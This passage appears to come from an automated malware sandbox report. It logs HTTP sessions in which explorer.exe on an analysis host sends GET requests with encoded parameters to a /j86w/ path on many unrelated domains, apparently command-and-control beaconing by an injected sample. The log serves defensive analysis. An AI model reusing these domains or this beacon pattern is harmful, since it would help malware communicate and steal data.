                                                                                          May 25, 2022 00:39:20.511228085 CEST8049811104.21.27.132192.168.2.5
                                                                                          May 25, 2022 00:39:20.511270046 CEST8049811104.21.27.132192.168.2.5
                                                                                          May 25, 2022 00:39:20.511286974 CEST8049811104.21.27.132192.168.2.5
                                                                                          May 25, 2022 00:39:20.511437893 CEST4981180192.168.2.5104.21.27.132
                                                                                          May 25, 2022 00:39:20.515574932 CEST4981180192.168.2.5104.21.27.132
                                                                                          May 25, 2022 00:39:25.562496901 CEST4981380192.168.2.5198.54.117.217
                                                                                          May 25, 2022 00:39:25.737798929 CEST8049813198.54.117.217192.168.2.5
                                                                                          May 25, 2022 00:39:25.737900019 CEST4981380192.168.2.5198.54.117.217
                                                                                          May 25, 2022 00:39:25.738101006 CEST4981380192.168.2.5198.54.117.217
                                                                                          May 25, 2022 00:39:25.913206100 CEST8049813198.54.117.217192.168.2.5
                                                                                          May 25, 2022 00:39:25.913234949 CEST8049813198.54.117.217192.168.2.5
                                                                                          May 25, 2022 00:39:30.949255943 CEST4981580192.168.2.5172.67.219.19
                                                                                          May 25, 2022 00:39:30.985327005 CEST8049815172.67.219.19192.168.2.5
                                                                                          May 25, 2022 00:39:30.985532045 CEST4981580192.168.2.5172.67.219.19
                                                                                          May 25, 2022 00:39:30.985747099 CEST4981580192.168.2.5172.67.219.19
                                                                                          May 25, 2022 00:39:31.021616936 CEST8049815172.67.219.19192.168.2.5
                                                                                          May 25, 2022 00:39:31.035084009 CEST8049815172.67.219.19192.168.2.5
                                                                                          May 25, 2022 00:39:31.035409927 CEST4981580192.168.2.5172.67.219.19
                                                                                          May 25, 2022 00:39:31.073637962 CEST8049815172.67.219.19192.168.2.5
                                                                                          May 25, 2022 00:39:31.280896902 CEST8049815172.67.219.19192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49790 | 37.97.135.188 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 25, 2022 00:37:20.692347050 CEST | 1305 | OUT | GET /j86w/?r0DdqnX=Kkb0DjnINT29w7Qrg2PFxeNyGIRzhfaNNN9zf2FlHT6WK5ZN02NS1QMbiS9ATrkigRb2&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.deta-hedman.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
May 25, 2022 00:37:20.725965977 CEST | 1306 | IN | HTTP/1.1 301 Moved Permanently
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Tue, 24 May 2022 22:37:20 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 169
                                                                                          Connection: close
                                                                                          Location: https://www.deta-hedman.com/j86w/?r0DdqnX=Kkb0DjnINT29w7Qrg2PFxeNyGIRzhfaNNN9zf2FlHT6WK5ZN02NS1QMbiS9ATrkigRb2&THiL=OBZhFrvhwhfT
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49791 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 25, 2022 00:37:30.851277113 CEST | 1307 | OUT | GET /j86w/?r0DdqnX=EvWqOpuITA36Tx+b1edEGBLtvk6gEbSmyN3aa/t6Vby44TN1y2mXcFBmC02e8zc2JU9V&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.shantellonlineshoph.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
May 25, 2022 00:37:30.916320086 CEST | 1308 | IN | HTTP/1.1 403 Forbidden
                                                                                          Date: Tue, 24 May 2022 22:37:30 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          X-Sorting-Hat-PodId: -1
                                                                                          X-Dc: gcp-europe-west1
                                                                                          X-Request-ID: a061d98a-e085-4c73-9795-9345c31a5e9f
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          X-Download-Options: noopen
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 7109842bdbbb995c-FRA
                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.5 | 49804 | 34.117.168.233 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 25, 2022 00:38:19.102739096 CEST | 1351 | OUT | GET /j86w/?r0DdqnX=yKTGLI+0hL2BDOWtnpkJD3ucTFHFYk4E4D+J/cKEoeBM9eHABkvZa3d9fxVWbjwcPE7R&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.jamiebakes.net
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
May 25, 2022 00:38:19.173266888 CEST | 1352 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Tue, 24 May 2022 22:38:19 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          x-wix-request-id: 1653431899.1131753714030379
                                                                                          Age: 0
                                                                                          Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3
                                                                                          X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMcNxqRTGgIypykrF8CfWT6c,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=,2d58ifebGbosy5xc+FRalrqyUxiBukN8lquytXnkXGlFXGwxNtUdqEtprkiYq/wojoe2GMQJ/MdiMK4Y/vI704TLHuFpCHeD62VpQP+vkYs=,2UNV7KOq4oGjA5+PKsX47GTyisN7iVCrYEwBeRKnkmpYgeUJqUXtid+86vZww+nL,7npGRUZHWOtWoP0Si3wDp6z7IyfxLR0DvGF38ZVfcXQ=,xTu8fpDe3EKPsMR1jrheEP5GNmd0+0JRnUZi7EYUt1s=,v8/9RyiPVS5W/0J6Pu/x94tgPhpxgFctFAnNxepA8jJamMqYX3qjq1DylQmfC+fQWIHlCalF7YnfvOr2cMPpyw==
                                                                                          Vary: Accept-Encoding
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Server: Pepyaka/1.19.10
                                                                                          Via: 1.1 google
                                                                                          x-wix-google-ccm: 1
                                                                                          Connection: close
                                                                                          Data Ascii: b93 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> <!


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.5 | 49805 | 38.143.25.232 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 25, 2022 00:38:29.606348991 CEST | 1356 | OUT | GET /j86w/?r0DdqnX=2zzkbFTe0CqkvIhXDvRYhtpHirIUiQLpINfg4yArn5qL17WIHFS6yL4WGUg38JzmT/ri&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.trustedhomebuying.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
May 25, 2022 00:38:29.785756111 CEST | 1357 | IN | HTTP/1.1 301 Moved Permanently
                                                                                          Server: nginx
                                                                                          Date: Tue, 24 May 2022 22:38:29 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 162
                                                                                          Connection: close
                                                                                          Location: https://www.trustedhomebuying.com/j86w/?r0DdqnX=2zzkbFTe0CqkvIhXDvRYhtpHirIUiQLpINfg4yArn5qL17WIHFS6yL4WGUg38JzmT/ri&THiL=OBZhFrvhwhfT
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.5 | 49806 | 81.171.22.6 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 25, 2022 00:38:35.149188995 CEST | 1357 | OUT | GET /j86w/?r0DdqnX=rKV3LRP602CRP/9iu+bG4aRty8vh7St3mzz2Fk7ILHaS3FPq+LENCLcMuosvpWOjIn1+&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.jupiter-directory.info
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
May 25, 2022 00:38:35.213639975 CEST | 1358 | IN | HTTP/1.1 302 Found
                                                                                          cache-control: max-age=0, private, must-revalidate
                                                                                          connection: close
                                                                                          content-length: 11
                                                                                          date: Tue, 24 May 2022 22:38:34 GMT
                                                                                          location: http://survey-smiles.com
                                                                                          server: nginx
                                                                                          set-cookie: sid=3f241c22-dbb2-11ec-80a0-d695bd1209cc; path=/; domain=.jupiter-directory.info; expires=Mon, 12 Jun 2090 01:52:42 GMT; max-age=2147483647; HttpOnly
                                                                                          Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                          Data Ascii: Redirecting


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.5 | 49808 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 25, 2022 00:38:40.324682951 CEST | 1365 | OUT | GET /j86w/?r0DdqnX=5yG98xSZmOV+Ql/97UdClrpjSiEw17qCWMbIEAVNPxEJnvqug39wnIBGciaFjvLM3BZW&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.route112mitsubishi.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
May 25, 2022 00:38:40.447870016 CEST | 1366 | IN | HTTP/1.1 403 Forbidden
                                                                                          Server: openresty
                                                                                          Date: Tue, 24 May 2022 22:38:40 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 291
                                                                                          ETag: "628d16df-123"
                                                                                          Via: 1.1 google
                                                                                          Connection: close
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.5 | 49809 | 198.54.117.218 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 25, 2022 00:39:04.706912041 CEST | 1367 | OUT | GET /j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXm HTTP/1.1
                                                                                          Host: www.popcornpor.xyz
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                          15 | 192.168.2.5 | 49810 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                          May 25, 2022 00:39:14.975522041 CEST | 1368 | OUT | GET /j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=B6LpOE6d/7MuN648rLPP1if6luFBaXG3uoSdTU7h2h/OfSHF8ecdbzOiSY+hNhlZ6vTT HTTP/1.1
                                                                                          Host: www.heiboard.xyz
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:39:15.099600077 CEST | 1368 | IN | HTTP/1.1 403 Forbidden
                                                                                          Server: openresty
                                                                                          Date: Tue, 24 May 2022 22:39:15 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 291
                                                                                          ETag: "628ae76f-123"
                                                                                          Via: 1.1 google
                                                                                          Connection: close
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                          16 | 192.168.2.5 | 49811 | 104.21.27.132 | 80 | C:\Windows\explorer.exe
                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                          May 25, 2022 00:39:20.297080994 CEST | 1369 | OUT | GET /j86w/?r0DdqnX=vMVi2n4UkuGvqKImt4Mc7stayAR4jokxL9y1S5u4wQQjObuyknXnWCzrkLLUpdjyfe94&9rP=o0DdI4tPFBHLuh HTTP/1.1
                                                                                          Host: www.burntkeroseneblueheelers.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:39:20.511228085 CEST | 1371 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Tue, 24 May 2022 22:39:20 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.3
                                                                                          Cache-Control: public, max-age=60
                                                                                          Vary: Accept-Language
                                                                                          CF-Cache-Status: MISS
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HPDXdIHdokenxLMxz2VFLmdh9nf%2BM4wa%2BIgtGiClV%2BvwM1Y5la1fJpJEp2fk3qJJEKssQpRnjnwekmibRE95SVUBIIGNryQlyvtKnRS5JqYkd30CIvDHOhT0181XdbC4hLTdMuI2m8DEr0TzW3f09JIcbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 710986d7e95e7190-LHR
                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                          Data Ascii: 6fe<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title>Error</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://fonts.googleapis.com/css?family=Roboto:500" rel="stylesheet"> <style type="text/css"> body { background-color: #fff; } .oops { font-family: Roboto, sans-serif; font-weight
                                                                                          May 25, 2022 00:39:20.511270046 CEST | 1372 | IN |
                                                                                          Data Ascii: : 500; line-height: 120px; font-size: 88px; color: #DADDE0; } .error-msg { position: absolute; left: 50%; top: 50%;
                                                                                          May 25, 2022 00:39:20.511286974 CEST | 1372 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                          17 | 192.168.2.5 | 49813 | 198.54.117.217 | 80 | C:\Windows\explorer.exe
                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                          May 25, 2022 00:39:25.738101006 CEST | 1379 | OUT | GET /j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=NReRvsvJRfGWlTK0vxyHeO9Y7SNAAXczgujBnihGKczK6Cn0FpBEGF9o5XqAzRdHptoj HTTP/1.1
                                                                                          Host: www.medicaleducationbangladesh.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                          18 | 192.168.2.5 | 49815 | 172.67.219.19 | 80 | C:\Windows\explorer.exe
                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                          May 25, 2022 00:39:30.985747099 CEST | 1387 | OUT | GET /j86w/?r0DdqnX=MHHHj9BXgxViWqPLnxqr1nFZFzNQ/F/VjXLjFAe6afOVeFSDEGKeMdk4NGPeJtlBjoTt&9rP=o0DdI4tPFBHLuh HTTP/1.1
                                                                                          Host: www.lingmao08.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:39:31.035084009 CEST | 1387 | IN | HTTP/1.1 301 Moved Permanently
                                                                                          Date: Tue, 24 May 2022 22:39:31 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Tue, 24 May 2022 23:39:31 GMT
                                                                                          Location: https://www.lingmao08.com/j86w/?r0DdqnX=MHHHj9BXgxViWqPLnxqr1nFZFzNQ/F/VjXLjFAe6afOVeFSDEGKeMdk4NGPeJtlBjoTt&9rP=o0DdI4tPFBHLuh
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H6AKjh8ReKhq2MOU%2BHjqVH1cYlFLr9HIFyAuA5fGx33zfRpr6dQjDDOjJ%2FNYmYUrpi44v06TRHxjE5wcMWNyOAsZZrjaUTYhO%2Bd9PkJK%2B8mgog3azzZGDH%2FE9%2FMfxAH7%2B2Bjlg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 7109871ab8b3f417-LHR
                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                          19 | 192.168.2.5 | 49816 | 34.117.168.233 | 80 | C:\Windows\explorer.exe
                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                          May 25, 2022 00:39:36.125531912 CEST | 1388 | OUT | GET /j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=yKTGLI+0hL2BDOWtnpkJD3ucTFHFYk4E4D+J/cKEoeBM9eHABkvZa3d9fxVWbjwcPE7R HTTP/1.1
                                                                                          Host: www.jamiebakes.net
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:39:36.192634106 CEST | 1390 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Tue, 24 May 2022 22:39:36 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          x-wix-request-id: 1653431976.1321752645730597
                                                                                          Age: 0
                                                                                          Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3
                                                                                          X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfwWumffprhrqhUts+0RXmk,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=,2d58ifebGbosy5xc+FRals47NSbRY+saEB7SkBjxpWV3meP9HntDblqLPs3WzFUcjoe2GMQJ/MdiMK4Y/vI707NcHT9jnDzO/9kyZO6+ozE=,2UNV7KOq4oGjA5+PKsX47ARSt+S4p3KgmtdD48b3UGRYgeUJqUXtid+86vZww+nL,7npGRUZHWOtWoP0Si3wDp+SOLc04u3suljHr5fp0ZSE=,xTu8fpDe3EKPsMR1jrheENjxvIi4S/tdauezSCBwpuE=,v8/9RyiPVS5W/0J6Pu/x9wnOoFETI3p6H585CnGOVufbBGrfgbVxXPGwhsTMrP9n
                                                                                          Vary: Accept-Encoding
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Server: Pepyaka/1.19.10
                                                                                          Via: 1.1 google
                                                                                          x-wix-google-ccm: 1
                                                                                          Connection: close
                                                                                          Data Ascii: b93 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link type="
                                                                                          May 25, 2022 00:39:36.192663908 CEST | 1391 | IN |
                                                                                          Data Ascii: image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href="//static.parastorage.com/services/third-party/fonts/Helvetica/fontFace.css" rel="stylesheet" type="text/css" /> ... --> <link rel="stylesheet" hre
                                                                                          May 25, 2022 00:39:36.192679882 CEST | 1392 | IN |
                                                                                          Data Ascii: cript src="//static.parastorage.com/services/wix-public/1.299.0/scripts/error-pages/app.js"></script> ... --><script> angular.module('wixErrorPagesApp').constant('staticsUrl', '//static.parastorage.com/services/wix-public/1.299.0/');


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                          2 | 192.168.2.5 | 49793 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                          May 25, 2022 00:37:36.025887966 CEST | 1320 | OUT | GET /j86w/?r0DdqnX=B6LpOE6d/7MuN648rLPP1if6luFBaXG3uoSdTU7h2h/OfSHF8ecdbzOiSY+hNhlZ6vTT&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.heiboard.xyz
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:37:36.150230885 CEST | 1321 | IN | HTTP/1.1 403 Forbidden
                                                                                          Server: openresty
                                                                                          Date: Tue, 24 May 2022 22:37:36 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 291
                                                                                          ETag: "628d16df-123"
                                                                                          Via: 1.1 google
                                                                                          Connection: close
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                          20 | 192.168.2.5 | 49817 | 217.160.0.206 | 80 | C:\Windows\explorer.exe
                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                          May 25, 2022 00:39:41.286144972 CEST | 1393 | OUT | GET /j86w/?r0DdqnX=wf5/vnneqUemtqC2qYInHLv4xbvkfp/IEqObvAzhO0jbXBUqPz0aZ0ecqS4jD5PKufzr&9rP=o0DdI4tPFBHLuh HTTP/1.1
                                                                                          Host: www.theminercrypto.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:39:41.412096977 CEST | 1394 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                          Server: nginx
                                                                                          Date: Tue, 24 May 2022 22:39:41 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 138
                                                                                          Connection: close
                                                                                          Location: https://www.theminercrypto.com/j86w/?r0DdqnX=wf5/vnneqUemtqC2qYInHLv4xbvkfp/IEqObvAzhO0jbXBUqPz0aZ0ecqS4jD5PKufzr&9rP=o0DdI4tPFBHLuh
                                                                                          Expires: Tue, 24 May 2022 22:59:41 GMT
                                                                                          Cache-Control: max-age=1200
                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                          21 | 192.168.2.5 | 49818 | 104.16.100.51 | 80 | C:\Windows\explorer.exe
                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                          May 25, 2022 00:39:46.440790892 CEST | 1394 | OUT | GET /j86w/?r0DdqnX=lsVlmHx19Z33OpYAA2l3OaUNFTqowkaGGuB1kFQKunhtdBhmvwVKxnLNF4eMBfOvAU/+&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.expoj3.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:39:46.475223064 CEST | 1395 | IN | HTTP/1.1 301 Moved Permanently
                                                                                          Date: Tue, 24 May 2022 22:39:46 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Tue, 24 May 2022 23:39:46 GMT
                                                                                          Location: https://www.expoj3.com/j86w/?r0DdqnX=lsVlmHx19Z33OpYAA2l3OaUNFTqowkaGGuB1kFQKunhtdBhmvwVKxnLNF4eMBfOvAU/+&THiL=OBZhFrvhwhfT
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 7109877b4e235b92-FRA
                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                          22 | 192.168.2.5 | 49819 | 15.197.142.173 | 80 | C:\Windows\explorer.exe
                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                          May 25, 2022 00:39:51.504981041 CEST | 1395 | OUT | GET /j86w/?r0DdqnX=Cda/DfRT+Myk92AVL8ZtInJusJj7ZXm0kCkpHstkNcvq7ssbimt58lhEnh+W6KwWQFgT&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.danilhodoekhi.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:39:51.556776047 CEST | 1396 | IN | HTTP/1.1 403 Forbidden
                                                                                          Server: awselb/2.0
                                                                                          Date: Tue, 24 May 2022 22:39:51 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 118
                                                                                          Connection: close
                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                                                          Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49795 | Destination IP: 165.231.150.75 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                                          Timestamp: May 25, 2022 00:37:41.464118004 CEST | kBytes transferred: 1328 | Direction: OUT | Data: GET /j86w/?r0DdqnX=PAI2HRDsqfIs7wB2n/P/l/z8laWiiZHLAnESXFGBG/nSKD0096HYiOL/EcW4CPuu9Zhp&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.tsreaur.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Timestamp: May 25, 2022 00:37:41.582911015 CEST | kBytes transferred: 1329 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                          Server: Tengine
                                                                                          Date: Tue, 24 May 2022 22:42:25 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 684
                                                                                          Connection: close
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body bgcolor="white"><h1>404 Not Found</h1><p>The requested URL was not found on this server. Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.tsreaur.com/j86w/?r0DdqnX=PAI2HRDsqfIs7wB2n/P/l/z8laWiiZHLAnESXFGBG/nSKD0096HYiOL/EcW4CPuu9Zhp&amp;THiL=OBZhFrvhwhfT</td></tr><tr><td>Server:</td><td>atld-gh-easyshop</td></tr><tr><td>Date:</td><td>2022/05/25 06:42:25</td></tr></table><hr/>Powered by Tengine</body></html>


                                                                                          Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49796 | Destination IP: 156.226.250.150 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                                          Timestamp: May 25, 2022 00:37:47.119066000 CEST | kBytes transferred: 1330 | Direction: OUT | Data: GET /j86w/?r0DdqnX=tkiTgEDY4Ttp5hV2NAZpvKTOl2tMD45nnNA9HzUYoopeMx94i1T5F8wdRmJN6yWBJNpO&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.iguaym.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
